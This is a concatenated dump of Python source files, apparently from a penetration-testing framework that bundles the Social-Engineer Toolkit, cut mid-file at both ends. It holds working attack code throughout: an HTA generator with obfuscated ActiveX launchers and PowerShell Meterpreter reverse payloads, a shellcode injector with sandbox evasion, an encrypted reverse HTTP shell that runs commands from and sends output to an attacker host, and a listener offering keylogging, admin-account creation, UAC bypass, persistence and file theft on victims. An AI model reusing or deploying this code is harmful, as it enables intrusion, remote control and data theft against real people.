# if its a zipfile zip the badboy up
if choice == "2":
# write to a zipfile here
file = zipfile.ZipFile(userconfigpath + "template.zip", "w")
for name in glob.glob(userconfigpath + "dll/*"):
file.write(name, os.path.basename(name), zipfile.ZIP_DEFLATED)
file.close()
if os.path.isfile(userconfigpath + "msf.exe"):
subprocess.Popen("cp %s/msf.exe %s/src/html/" %
(userconfigpath, definepath), shell=True).wait()
| 4,494 | Python | .py | 121 | 33.438017 | 128 | 0.666053 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,819 | main.py | CHEGEBB_africana-framework/externals/set/src/webattack/hta/main.py | #!/usr/bin/env python3
######################################################
#
# Main files for the HTA attack vector within SET
#
######################################################
from src.core.setcore import *
def gen_hta_cool_stuff():
print_status("HTA Attack Vector selected. Enter your IP, Port, and Payload...")
ipaddr = grab_ipaddress()
update_options("IPADDR=%s" % (ipaddr))
port = input("Enter the port for the reverse payload [443]: ")
if port == "": port = "443"
print("""Select the payload you want to deliver:\n\n 1. Meterpreter Reverse HTTPS\n 2. Meterpreter Reverse HTTP\n 3. Meterpreter Reverse TCP\n""")
selection = input("Enter the payload number [1-3]: ")
# define the payloads
if selection == "": selection = "1"
if selection == "1": selection = "windows/meterpreter/reverse_https"
if selection == "2": selection = "windows/meterpreter/reverse_http"
if selection == "3": selection = "windows/meterpreter/reverse_tcp"
# generate powershell code
print_status("Generating powershell injection code and x86 downgrade attack...")
ps = generate_powershell_alphanumeric_payload(selection, ipaddr, port, "x86")
command = (powershell_encodedcommand(ps))
# hta code here
print_status("Embedding HTA attack vector and PowerShell injection...")
# grab cloned website
url = fetch_template()
command = command.replace("'", "\\'")
# generate random variable names for vba
hta_rand = generate_random_string(10, 30)
# split up so we arent calling shell command for cmd.exe
shell_split1 = generate_random_string(10, 30)
shell_split2 = generate_random_string(10, 30)
shell_split3 = generate_random_string(10, 30)
shell_split4 = generate_random_string(10, 30)
shell_split5 = generate_random_string(10, 30)
cmd_split1 = generate_random_string(10, 30)
cmd_split2 = generate_random_string(10, 30)
cmd_split3 = generate_random_string(10, 30)
cmd_split4 = generate_random_string(10, 30)
main1 = ("""<script>\n{0} = "WS";\n{1} = "crip";\n{2} = "t.Sh";\n{3} = "ell";\n{4} = ({0} + {1} + {2} + {3});\n{5}=new ActiveXObject({4});\n""".format(shell_split1, shell_split2, shell_split3, shell_split4, shell_split5, hta_rand, shell_split5))
main2 = ("""{0} = "cm";\n{1} = "d.e";\n{2} = "xe";\n{3} = ({0} + {1} + {2});\n{4}.run('%windir%\\\\System32\\\\""".format(cmd_split1,cmd_split2,cmd_split3,cmd_split4,hta_rand))
main3 = ("""' + {0} + """.format(cmd_split4))
main4 = ("""' /c {0}', 0);window.close();\n</script>""".format(command))
html_code = ("""<iframe id="frame" src="Launcher.hta" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>></iframe>\n<script type="text/javascript">setTimeout(function(){window.location.href="%s";}, 15000);</script>""" % url)
# metasploit answer file here
filewrite = open(userconfigpath + "meta_config", "w")
filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j\n\n" % (selection, ipaddr, port))
filewrite.close()
# write out main1 and main2
filewrite = open(userconfigpath + "hta_index", "w")
filewrite.write(html_code)
filewrite.close()
# write out launcher.hta
filewrite = open(userconfigpath + "Launcher.hta", "w")
filewrite.write(main1 + main2 + main3 + main4)
filewrite.close()
| 3,485 | Python | .py | 58 | 55.344828 | 284 | 0.64956 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,820 | pyinjector_args.py | CHEGEBB_africana-framework/externals/set/src/payloads/set_payloads/pyinjector_args.py | #!/usr/bin/python3
import ctypes
import sys
import multiprocessing
# Written by Dave Kennedy (ReL1K) @ TrustedSec.com
# Injects shellcode into memory through Python and ctypes
#
# Initial awesome code and credit found here:
# http://www.debasish.in/2012_04_01_archive.html
# added sandbox evasion here - most sandboxes use only 1 core
if multiprocessing.cpu_count() < 2:
exit()
# see if we specified shellcode
try:
sc = sys.argv[1]
# if we didn't specify a param
except IndexError:
sys.exit()
# need to code the input into the right format through string escape
sc = sc.decode("string_escape")
# convert to bytearray
sc = bytearray(sc)
# use types windll.kernel32 for virtualalloc reserves region of pages in
# virtual address space
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(sc)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
# use virtuallock to lock region for physical address space
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
ctypes.c_int(len(sc)))
# read in the buffer
buf = (ctypes.c_char * len(sc)).from_buffer(sc)
# moved the memory in 4 byte blocks
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(sc)))
# launch in a thread
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
# waitfor singleobject
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))
| 1,930 | Python | .py | 46 | 30.913043 | 78 | 0.591249 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,821 | http_shell.py | CHEGEBB_africana-framework/externals/set/src/payloads/set_payloads/http_shell.py | #!/usr/bin/python3
##########################################################################
#
#
# AES Encrypted Reverse HTTP Shell by:
#
# Dave Kennedy (ReL1K)
# http://www.trustedsec.com
#
##########################################################################
#
##########################################################################
#
# To compile, you will need pyCrypto, it's a pain to install if you do it from source, should get the binary modules
# to make it easier. Can download from here:
# http://www.voidspace.org.uk/cgi-bin/voidspace/downman.py?file=pycrypto-2.0.1.win32-py2.5.zip
#
##########################################################################
#
# This shell works on any platform you want to compile it in. OSX, Windows, Linux, etc.
#
##########################################################################
#
##########################################################################
#
# Below is the steps used to compile the binary. py2exe requires a dll to be used in conjunction
# so py2exe was not used. Instead, pyinstaller was used in order to byte compile the binary.
#
##########################################################################
#
# export VERSIONER_PYTHON_PREFER_32_BIT=yes
# python Configure.py
# python Makespec.py --onefile --noconsole shell.py
# python Build.py shell/shell.spec
#
##########################################################################
import urllib
from Cryptodome.Cipher import AES
import sys
import os
import http.client
import subprocess
import base64
import time
# the block size for the cipher object; must be 16, 24, or 32 for AES
BLOCK_SIZE = 32
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
# secret key, change this if you want to be unique
secret = "(3j^%sh@hd3hDH2u3h@*!~h~2&^lk<!L"
# random junk
random = "sdfdsfdsdfsfd@#2$"
# create a cipher object using the random secret
cipher = AES.new(secret, AES.MODE_ECB)
# TURN THIS ON IF YOU WANT PROXY SUPPORT
PROXY_SUPPORT = "OFF"
# THIS WILL BE THE PROXY URL
PROXY_URL = "http://proxystuff:80"
# USERNAME FOR THE PROXY
USERNAME = "username_here"
# PASSWORD FOR THE PROXY
PASSWORD = "password_here"
# here is where we set all of our proxy settings
if PROXY_SUPPORT == "ON":
auth_handler = urllib.request.HTTPBasicAuthHandler()
auth_handler.add_password(realm='RESTRICTED ACCESS', uri=PROXY_URL,
user=USERNAME, passwd=PASSWORD)
opener = urllib.request.build_opener(auth_handler)
urllib.request.install_opener(opener)
try:
# our reverse listener ip address
address = sys.argv[1]
# our reverse listener port address
port = sys.argv[2]
# except that we didn't pass parameters
except IndexError:
print(" \nAES Encrypted Reverse HTTP Shell by:")
print(" Dave Kennedy (ReL1K)")
print(" http://www.trustedsec.com")
print("Usage: shell.exe <reverse_ip_address> <rport>")
time.sleep(0.1)
sys.exit()
# loop forever
while 1:
# open up our request handelr
req = urllib.request.Request('http://%s:%s' % (address, port))
# grab our response which contains what command we want
message = urllib.request.urlopen(req)
# base64 unencode
message = base64.b64decode(message.read())
# decrypt the communications
message = DecodeAES(cipher, message)
# quit out if we receive that command
if message == "quit" or message == "exit":
sys.exit()
# issue the shell command we want
message = message.replace("{", "")
proc = subprocess.Popen(message, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# read out the data of stdout
data = proc.stdout.read() + proc.stderr.read()
# encrypt the data
data = EncodeAES(cipher, data)
# base64 encode the data
data = base64.b64encode(data)
# urlencode the data from stdout
data = urllib.parse.urlencode({'cmd': '%s'}) % (data)
# who we want to connect back to with the shell
h = http.client.HTTPConnection('%s:%s' % (address, port))
# set our basic headers
headers = {"User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)",
"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
# actually post the data
h.request('POST', '/index.aspx', data, headers)
| 4,894 | Python | .py | 122 | 37.016393 | 116 | 0.620668 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,822 | listener.py | CHEGEBB_africana-framework/externals/set/src/payloads/set_payloads/listener.py | #! /usr/bin/python3
from socket import *
import os
import threading
import sys
import re
import thread
import time
import select
import base64
import datetime
import subprocess
import binascii
from src.core.setcore import *
definepath = os.getcwd()
sys.path.append(definepath)
# cleanup
if os.path.isfile(userconfigpath + "uac.address"):
os.remove(userconfigpath + "uac.address")
if os.path.isfile(userconfigpath + "system.address"):
os.remove(userconfigpath + "system.address")
# will remove this later
core_modules = True
####################################################################
# #
# The Social-Engineer Toolkit Interactive Shell Listener #
# #
####################################################################
def start_listener():
# grab the operating system
operating_system = check_os()
# try to import readline, if not, disable tab completion
tab_complete = True
try:
import readline
# handle exception if readline isn't imported
except ImportError:
print("[!] python-readline is not installed, tab completion will be disabled.")
# turn tab_complete to false and disable it
tab_complete = False
# specify we are using core module, need to clean this up and remove later
core_module = True
# allow readline tab completion
if tab_complete == True:
readline.parse_and_bind("tab: complete")
HOST = '' # bind to all interfaces
# try command line arguments first
try:
PORT = int(sys.argv[1])
# handle index error
except IndexError:
if check_options("PORT=") != 0:
PORT = check_options("PORT=")
else:
# port number prompt for SET listener
PORT = input(setprompt("0", "Port to listen on [443]"))
if PORT == "":
# if null then default to port 443
print("[*] Defaulting to port 443 for the listener.")
PORT = 443
update_options("PORT=443")
try:
# make the port an integer
PORT = int(PORT)
except ValueError:
while 1:
print_warning("Needs to be a port number!")
PORT = input(setprompt("0", "Port to listen on: "))
if PORT == "":
PORT = 443
break
try:
PORT = int(PORT)
break
except ValueError:
PORT = 443
break
# log error messages
def log(error):
# check to see if path is here
if os.path.isfile("src/logs/"):
# grab the date and time for now
now = datetime.datetime.today()
# all error messages will be posted in set_logfile.txt
filewrite = open("src/logs/set_logfile.log", "a")
filewrite.write(now + error + "\r\n")
filewrite.close()
# specify it as nothing until we make it past our encryption check
try:
from Cryptodome.Cipher import AES
# set encryption key to 1
encryption = 1
print_status(
"Crypto.Cipher library is installed. AES will be used for socket communication.")
print_status(
"All communications will leverage AES 256 and randomized cipher-key exchange.")
# the block size for the cipher object; must be 16, 24, or 32 for AES
BLOCK_SIZE = 32
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
# generate a random secret key
secret = os.urandom(BLOCK_SIZE)
# create a cipher object using the random secret
cipher = AES.new(secret, AES.MODE_ECB)
# if it isn't import then trigger error and turn off encryption
except ImportError:
# this means that python-crypto is not installed and we need to set the
# encryption flag to 0, which turns off communications
encryption = 0
print_warning(
"Crypto.Cipher python module not detected. Disabling encryption.")
if operating_system != "windows":
print_warning(
"If you want encrypted communications download from here: http://ftp.dlitz.net/pub/dlitz/crypto/pycrypto/pycrypto-2.3.tar.gz")
print_warning(
"Or if your on Ubuntu head over to: http://packages.ubuntu.com/search?keywords=python-crypto")
print_warning(
"Or you can simply type apt-get install python-crypto or in Back|Track apt-get install python2.5-crypto")
# universal exit message
def exit_menu():
print("\n[*] Exiting the Social-Engineer Toolkit (SET) Interactive Shell.")
mysock = socket.socket(AF_INET, SOCK_STREAM)
mysock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
addr = (HOST, PORT)
try:
mysock.bind(addr)
mysock.listen(100000)
except Exception as error:
if core_modules == True:
log(error)
print_error(
"ERROR:Unable to bind to listener port, do you have something else listening?")
sys.exit() # exit_set()
if core_modules == False:
sys.exit("[!] Unable to bind to interfact. Try again.")
# base count handler
count = 0
# send packet is used to determine if encryption is in use or not
def send_packet(message, conn, encryption):
# we put a try/except block here in case of socket error. if it has an exception
# here, it would completely kill the session. we want to make it as stable as possible even
# after error.
try:
# if encryption is enabled then send this
if encryption == 1:
# we encrypt our output here
encoded = EncodeAES(cipher, message)
# we take the length of the encrypted string
normal_size = len(encoded)
# we turn the length of our string into a string literal
normal_size = str(normal_size)
# we encrypt our string literal
normal_size_crypt = EncodeAES(cipher, normal_size)
# we send our encrypted string literal to let our server know h$
# true encrypted string is
conn.send(str(normal_size_crypt))
time.sleep(0.3)
# we send our encrypted string
conn.send(str(encoded))
# if encryption is disabled then send this
if encryption == 0:
message_size = str(len(message))
conn.send(message_size)
conn.send(str(message))
# handle exceptions
except Exception as e:
print_warning(
"An exception occured. Handling it and keeping session alive. Error: " + str(e))
pass
# decrypt received packets
def decrypt_packet(message, encryption):
# try/except block to keep socket alive
try:
# if encrypt then decode
if encryption == 1:
return DecodeAES(cipher, message)
# if not encrypted then return result
if encryption == 0:
return message
# handle exceptions
except Exception as e:
print_warning(
"An exception occured. Handling it and keeping session alive. Error: " + str(e))
pass
# handle tab completion here for set interactive menu
class Completer:
def __init__(self):
if operating_system == "windows":
self.words = ["shell", "localadmin", "help", "?", "domainadmin", "ssh_tunnel", "bypassuac", "lockworkstation", "grabsystem", "download",
"upload", "ps", "kill", "keystroke_start", "keystroke_dump", "reboot", "persistence", "removepersistence", "shellcode", "cls", "clear"]
if operating_system == "posix":
self.words = ["shell", "help", "?", "ssh_tunnel",
"download", "upload", "reboot", "cls", "clear"]
self.prefix = None
def complete(self, prefix, index):
if prefix != self.prefix:
self.matching_words = [
w for w in self.words if w.startswith(prefix)]
self.prefix = prefix
else:
pass
try:
return self.matching_words[index]
except IndexError:
return None
# handle tab completion here for initial choice selection
class Completer2:
def __init__(self):
self.words = []
self.prefix = None
def complete(self, prefix, index):
if prefix != self.prefix:
self.matching_words = [
w for w in self.words if w.startswith(prefix)]
self.prefix = prefix
else:
pass
try:
return self.matching_words[index]
except IndexError:
return None
# main socket handler
def handle_connection(conn, addr, encryption, operating_system):
print_status(
"Dropping into the Social-Engineer Toolkit Interactive Shell.")
# put an exceptions block in here
try:
# if we are leveraging encryption
if encryption == 1:
# generate a random 52 character string
random_string = os.urandom(52)
data = conn.send(random_string)
# confirm that we support encryption
data = conn.recv(1024)
if data == random_string:
# This method isn't probably the most desirable since it can
# be intercepted and unhex'd during transmission. Provides a
# good level of encryption unless the ciphertext is used as the
# AES decryption string. This is a first pass, will improve over
# time. Could hardcode keys on server/client but would have an
# even less desirable effect. Overall, solution will be to use
# pub/private RSA certs
secret_send = binascii.hexlify(secret)
conn.send(secret_send)
# if we didn't receive the confirmation back then we don't
# support encryption
else:
encryption = 0
# if we aren't using encryption then tell the victim
if encryption == 0:
# generate a random 51 character string
random_string = os.urandom(51)
conn.send(random_string)
# acknowledge encryption has been disabled
data = conn.recv(51)
# decrypt the data if applicable
data = decrypt_packet(data, encryption)
except Exception as e:
print(e)
print_warning(
"Looks like the session died. Dropping back into selection menu.")
return_continue()
global count
count = 2
garbage1 = ""
garbage2 = ""
garbage3 = ""
thread.start_new_thread(
call_connections, (d, garbage1, garbage2, garbage3))
sys.exit() # exit_set()
# initial try loop to catch keyboard interrupts and exceptions
try:
# start initial loop for menu
while 1:
# main SET menu
if tab_complete == True:
completer = Completer()
readline.set_completer(completer.complete)
data = input(setprompt(["25"], ""))
# if data is equal to quit or exit then break out of loop and
# exit
if data == "quit" or data == "exit" or data == "back":
print_warning("Dropping back to list of victims.\n")
send_packet("quit", conn, encryption)
break
if data == "cls" or data == "clear":
os.system("clear")
# if user specifies help do this
if data == "help" or data == "?":
print("Welcome to the Social-Engineer Toolkit Help Menu.\n\nEnter the following commands for usage:")
# universal commands
if operating_system == "posix" or operating_system == "windows":
print("""
Command: shell
Explanation: drop into a command shell
Example: shell
Command: download <path_to_file>
Explanation: downloads a file locally to the SET root directory.
Example: download C:\\boot.ini or download /etc/passwd
Command: upload <path_to_file_on_attacker> <path_to_write_on_victim>
Explanation: uploads a file to the victim system
Example: upload /root/nc.exe C:\\nc.exe or upload /root/backdoor.sh /root/backdoor.sh
Command: ssh_tunnel <attack_ip> <attack_ssh_port> <attack_tunnelport> <user> <pass> <tunnel_port>
Explanation: This module tunnels ports from the compromised victims machine back to your machine.
Example: ssh_tunnel publicipaddress 22 80 root complexpassword?! 80
Command: exec <command>
Explanation: Execute a command on your LOCAL 'attacker' machine.
Example exec ls -al
Command: ps
Explanation: List running processes on the victim machine.
Example: ps
Command: kill <pid>
Explanation: Kill a process based on process ID (number) returned from ps.
Example: kill 3143
Command: reboot now
Explanation: Reboots the remote server instantly.
Example: reboot now""")
# if we're running under windows
if operating_system == "windows":
print("""
Command: localadmin <username> <password>
Explanation: adds a local admin to the system
Example: localadmin bob p@55w0rd!
Command: domainadmin <username> <password>
Explanation: adds a local admin to the system
Example: domainadmin bob p@55w0rd!
Command: bypassuac <ipaddress_of_listener> <port_of_listener> <x86 or x64>
Explanation: Trigger another SET interactive shell with the UAC safe flag
Example bypassuac 172.16.32.128 443 x64
Command: grabsystem <ipaddress_of_listener> <port_of_listener>
Explanation: Uploads a new set interactive shell running as a service and as SYSTEM.
Caution: If using on Windows 7 with UAC enabled, run bypassuac first before running this.
Example: grabsystem 172.16.32.128 443
Command: keystroke_start
Explanation: Starts a keystroke logger on the victim machine. It will stop when shell exits.
Example: keystroke_start
Command: keystroke_dump
Explanation: Dumps the information from the keystroke logger. You must run keystroke_start first.
Example: keystroke_dump
Command: lockworkstation
Explanation: Will lock the victims workstation forcing them to log back in. Useful for capturing keystrokes.
Example: lockworkstation
Command: persistence <ipaddress_of_listener> <port_of_listener>
Explanation: Persistence will spawn a SET interactive shell every 30 minutes on the victim machine.
Example: persistence 172.16.32.128 443
Warning: Will not work with UAC enabled *yet*.
Command: removepersistence
Explanation: Will remove persistence from the remote victim machine.
Example: removepersistence
Command: shellcode
Explanation: This will execute native shellcode on the victim machine through python.
Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
""")
try:
# base counter to see if command is invalid
base_counter = 0
# do a quick search to execute a local command
match = re.search("exec", data)
if match:
# trigger we hit
base_counter = 1
# define temp_data to test if we have more than one
# command other than exec
temp_data = data.split(" ")
# remove the exec name from the command
data = data.replace("exec ", "")
# grab the command
command = data
# assign data to exec for handler below
data = "exec"
# see if we have a value, if not through an indexerror
data = "exec test"
data = data.split(" ")
temp_data = temp_data[1]
data = "exec"
# split into tuple in case localadmin is used
data = data.split(" ")
# if data[0] is localadmin then split up the creds and data
if data[0] == "localadmin":
creds = "%s,%s" % (data[1], data[2])
data = "localadmin"
base_counter = 1
# if data[0] is domainadmin then split up the creds and
# data
if data[0] == "domainadmin":
creds = "%s,%s" % (data[1], data[2])
data = "domainadmin"
base_counter = 1
# if data[0] is equal to shell then go to normal
if data[0] == "shell":
base_counter = 1
data = data[0]
# if data[0] is equal to download
if data[0] == "download":
# assign download_path
download_path = data[1]
# assign data[0]
data = data[0]
base_counter = 1
# if data[0] is equal to ssh_port_forward then use port
# forwarding
if data[0] == "ssh_tunnel":
# IP of the SSH server
ssh_server_ip = data[1]
# PORT of the SSH server
ssh_server_port_address = data[2]
# PORT to use on localhost for tunneled protcol
ssh_server_tunnel_port = data[3]
# username for SSH server
ssh_server_username = data[4]
# password for SSH server
ssh_server_password = data[5]
# PORT to forward from victim
victim_server_port = data[6]
# specify data as ssh_port_tunnel
data = data[0]
base_counter = 1
# if data[0] is equal to upload_file
if data[0] == "upload":
# assign executable path to upload
upload = data[1]
# assign path to write file on opposite side
write_path = data[2]
# assign data[0]
data = data[0]
base_counter = 1
# bypassuac
if data[0] == "bypassuac":
# ipaddress and port
ipaddress = data[1] + " " + data[2]
exe_platform = data[3]
data = data[0]
base_counter = 1
# persistence
if data[0] == "persistence":
ipaddress = data[1] + " " + data[2]
data = data[0]
base_counter = 1
if data[0] == "removepersistence":
base_counter = 1
data = data[0]
if data[0] == "keystroke_start":
data = "keystroke_start"
base_counter = 1
if data[0] == "keystroke_dump":
data = "keystroke_dump"
base_counter = 1
# grabsystem
if data[0] == "grabsystem":
# define ipaddress
ipaddress = data[1] + " " + data[2]
data = data[0]
base_counter = 1
# lock workstation
if data[0] == "lockworkstation":
data = "lockworkstation"
base_counter = 1
# if data[0] is equal to ps
if data[0] == "ps":
data = "ps"
base_counter = 1
# if data[0] is equal to reboot
if data[0] == "reboot":
if data[1] == "now":
data = "reboot now"
base_counter = 1
# if data[0] is equal kill
if data[0] == "kill":
pid_number = data[1]
data = "kill"
base_counter = 1
# if data[0] is equal to exec
if data[0] == "exec":
data = "exec"
base_counter = 1
# shellcodeexec
if data[0] == "shellcode":
shellcode_inject = input(
"Paste your shellcode into here: ")
shellcode_inject = shellcode_inject.decode(
"string_escape")
data = "shellcode"
base_counter = 1
if data[0] == "help" or data[0] == "?":
base_counter = 1
if data[0] == "":
base_counter = 1
if data[0] == "cls" or data[0] == "clear":
base_counter = 1
if base_counter == 0:
print("[!] The command was not recognized.")
# handle range errors and throw correct syntax
except IndexError:
if data[0] == "kill":
print("[!] Usage: kill <pid_id>")
if data[0] == "exec":
print("[!] Usage: exec <command>")
if data[0] == "bypassuac":
print("[!] Usage: bypassuac <set_reverse_listener_ip> <set_port> <x64 or x86>")
if data[0] == "upload":
print("[!] Usage: upload <filename> <path_on_victim>")
if data[0] == "download":
print("[!] Usage: download <filename>")
if data[0] == "ssh_tunnel":
print("[!] Usage: ssh_tunnel <attack_ip> <attack_ssh_port> <attack_tunnelport> <user> <pass> <tunnel_port>")
if data[0] == "domainadmin":
print("[!] Usage: domainadmin <username> <password>")
if data[0] == "localadmin":
print("[!] Usage: localadmin <username> <password>")
if data[0] == "grabsystem":
print("[!] Usage: grabsystem <ipaddress_of_listener> <port_of_listener>")
if data[0] == "reboot":
print("[!] Usage: reboot now")
if data[0] == "persistence":
print("[!] Usage: persistence <set_reverse_listener_ip> <set_port>")
if data[0] == "shellcode":
print("[!] Usage: shellcode <paste shellcode>")
# in case of an attribute error just pass and restart
except AttributeError as e:
# write to log file then pass
log(e)
pass
# handle the rest of errors
except Exception as e:
print("[!] Something went wrong, printing error: " + str(e))
log(e)
garbage1 = ""
garbage2 = ""
garbage3 = ""
thread.start_new_thread(
call_connections, (d, garbage1, garbage2, garbage3))
sys.exit()
# if data is equal to shell
if data == "shell":
send_packet(data, conn, encryption)
print("[*] Entering a Windows Command Prompt. Enter your commands below.\n")
while 1:
try:
# accept raw input
data = input(setprompt(["25", "26"], ""))
# if we specify exit or quit then get out
if data == "exit" or data == "quit" or data == "back":
print("[*] Dropping back to interactive shell... ")
send_packet(data, conn, encryption)
break
if data != "":
send_packet(data, conn, encryption)
# this will receive length of data socket we
# need
data = conn.recv(1024)
# decrypt the data length
data = decrypt_packet(data, encryption)
# here is an ugly hack but it works, basically we set two
# counters. MSGLEN which will eventually equal the length
# of what number was sent to us which represented the length
# of the output of the shell command we executed. Dataout
# will eventually equal the entire string loaded into our
# buffer then sent for decryption.
#
# A loop is started which continues to receive until we hit
# the length of what our entire full encrypted shell output
# is equaled. Once that occurs, we are out of our loop and
# the full string is sent to the decryption routine and
# presented back to us.
MSGLEN = 0
dataout = ""
length = int(data)
while 1:
data = conn.recv(1024)
if not data:
break
dataout += data
MSGLEN = MSGLEN + len(data)
if MSGLEN == int(length):
break
# decrypt our command line output
data = decrypt_packet(dataout, encryption)
# display our output
print(data)
# handle error generally means base 10 error message which means there
# was no response. Socket probably died somehow.
except ValueError as e:
# write to log file
log(e)
print("[!] Response back wasn't expected. The session probably died.")
garbage1 = ""
garbage2 = ""
garbage3 = ""
thread.start_new_thread(
call_connections, (d, garbage1, garbage2, garbage3))
sys.exit() # exit_set()
# if data is equal to localadmin then flag and add a local user
# account
if data == "localadmin":
print("[*] Attempting to add a user account with administrative permissions.")
send_packet(data, conn, encryption)
send_packet(creds, conn, encryption)
print("[*] User add completed. Check the system to ensure it worked correctly.")
# if data is equal to domainadmin then flag and add a local
# admin account
if data == "domainadmin":
print("[*] Attempting to add a user account with domain administrative permissions.")
send_packet(data, conn, encryption)
send_packet(creds, conn, encryption)
print("[*] User add completed. Check the system to ensure it worked correctly.")
# keystroke logger
if data == "keystroke_start":
send_packet(data, conn, encryption)
print("[*] Keystroke logger has been started on the victim machine")
# dump the data
if data == "keystroke_dump":
send_packet(data, conn, encryption)
data = conn.recv(1024)
data = decrypt_packet(data, encryption)
data = conn.recv(int(data))
data = decrypt_packet(data, encryption)
print(data)
# if data is equal to download
if data == "download":
# trigger our shell to go in downloadfile mode
data = "downloadfile"
# send that we are in downloadfile mode
send_packet(data, conn, encryption)
# send our file path
send_packet(download_path, conn, encryption)
# mark a flag for write
download_path = download_path.replace("\\", "_")
download_path = download_path.replace("/", "_")
download_path = download_path.replace(":", "_")
filewrite = open(download_path, "wb")
# start a loop until we are finished getting data
# recv data
data = conn.recv(1024)
data = decrypt_packet(data, encryption)
# here is an ugly hack but it works, basically we set two
# counters. MSGLEN which will eventually equal the length
# of what number was sent to us which represented the length
# of the output of the file.
# Dataout will eventually equal the entire string loaded into our
# buffer then sent for decryption.
#
# A loop is started which continues to receive until we hit
# the length of what our entire full encrypted file output
# is equaled. Once that occurs, we are out of our loop and
# the full string is sent to the decryption routine and
# presented back to us.
MSGLEN = 0
dataout = ""
length = int(data)
while MSGLEN != length:
data = conn.recv(1024)
dataout += data
MSGLEN = MSGLEN + len(data)
data = decrypt_packet(data, encryption)
# if the file wasn't right
if data == "File not found.":
print("[!] Filename was not found. Try again.")
break
if data != "File not found.":
# write the data to file
filewrite.write(data)
filewrite.close()
# grab our current path
definepath = os.getcwd()
print("[*] Filename: %s successfully downloaded." % (download_path))
print("[*] File stored at: %s/%s" % (definepath, download_path))
# lock workstation
if data == "lockworkstation":
print("[*] Sending the instruction to lock the victims workstation...")
send_packet(data, conn, encryption)
print("[*] Victims workstation has been locked...")
# grabsystem
if data == "grabsystem":
data = "getsystem"
# send that we want to upload a file to the victim
# controller
send_packet(data, conn, encryption)
time.sleep(0.5)
write_path = "not needed"
send_packet(write_path, conn, encryption)
# specify null variable to store our buffer for our file
data_file = ""
if os.path.isfile("src/payloads/set_payloads/shell.windows"):
upload = "src/payloads/set_payloads/shell.windows"
if os.path.isfile("shell.windows"):
upload = "shell.windows"
if os.path.isfile(upload):
fileopen = open(upload, "rb")
print("[*] Attempting to upload interactive shell to victim machine.")
# open file for reading
data_file = fileopen.read()
fileopen.close()
# send the file line by line to the system
send_packet(data_file, conn, encryption)
# receive length of confirmation
data = conn.recv(1024)
# decrypt the confirmation
data = decrypt_packet(data, encryption)
# now receive confirmation
data = conn.recv(int(data))
# encrypt our confirmation or failed upload
data = decrypt_packet(data, encryption)
# if we were successful
if data == "Confirmed":
print("[*] SET Interactive shell successfully uploaded to victim.")
# if we failed
if data == "Failed":
print("[!] File had an issue saving to the victim machine. Try Again?")
# delay 5 seconds
time.sleep(0.5)
# write out system
if os.path.isfile("%s/system.address" % (userconfigpath)):
os.remove("%s/system.address" % (userconfigpath))
filewrite = open("%s/system.address" % (userconfigpath), "w")
filewrite.write(addr)
filewrite.close()
# send the ipaddress and port for reverse connect back
send_packet(ipaddress, conn, encryption)
print("[*] You should have a new shell spawned that is running as SYSTEM in a few seconds...")
# bypassuac
if data == "bypassuac":
# define uac string
# had to do some funky stuff here because global vars are not working properly
# inside threads, so the information cant be passed to
# normal outside routines
if os.path.isfile(userconfigpath + "uac.address"):
os.remove(userconfigpath + "uac.address")
filewrite = open(userconfigpath + "uac.address", "w")
filewrite.write(addr)
filewrite.close()
# send that we want to upload a file to the victim
# controller
send_packet(data, conn, encryption)
time.sleep(0.5)
# now that we're inside that loop on victim we need to give it parameters
# we will send the write_path to the victim to prep the
# filewrite
write_path = "not needed"
# send packet over
send_packet(write_path, conn, encryption)
# specify null variable to store our buffer for our file
data_file = ""
if exe_platform == "x64":
if os.path.isfile("src/payloads/set_payloads/uac_bypass/x64.binary"):
upload = "src/payloads/set_payloads/uac_bypass/x64.binary"
if os.path.isfile("uac_bypass/x64.binary"):
upload = "uac_bypass/x64.binary"
if exe_platform == "x86":
